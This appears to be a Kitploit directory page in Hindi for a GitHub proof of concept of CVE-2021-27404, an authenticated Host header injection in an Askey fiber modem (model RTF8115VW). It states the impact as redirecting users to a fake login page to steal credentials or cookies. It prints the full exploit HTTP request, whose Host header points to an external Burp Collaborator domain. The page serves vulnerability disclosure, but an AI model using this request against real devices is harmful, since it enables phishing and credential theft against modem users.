Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-27404 — HostHeaderInjection-Askey | Kitploit
उपकरण/GitHubGitHub/bokanrb/cve-2021-27404
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbokanrb/cve-2021-27404

CVE-2021-27404

HostHeaderInjection-Askey

रिपॉजिटरी देखें
3125 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रमाणित होस्ट हेडर इंजेक्शन - Askey इंटरनेट फाइबर मॉडेम

विक्रेता: Askey
सॉफ़्टवेयर संस्करण: BR_SV_g11.11_RTF_TEF001_V6.54_V014
मॉडल: RTF8115VW
संवेदनशील हेडर: Host
अन्य मॉडल/संस्करण में परीक्षण नहीं किया गया।

प्रभाव: एक हमलावर इस भेद्यता का लाभ उठाकर उपयोगकर्ता को नकली लॉगिन पृष्ठ पर पुनर्निर्देशित कर सकता है, ताकि उसके क्रेडेंशियल या कुकीज़ निकाल सके।

अंतिम अनुरोध

root@kitploit:~
GET / HTTP/1.1
Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net
Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/cgi-bin/te_logout.cgi
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate

Alt text

टूल डाउनलोड करें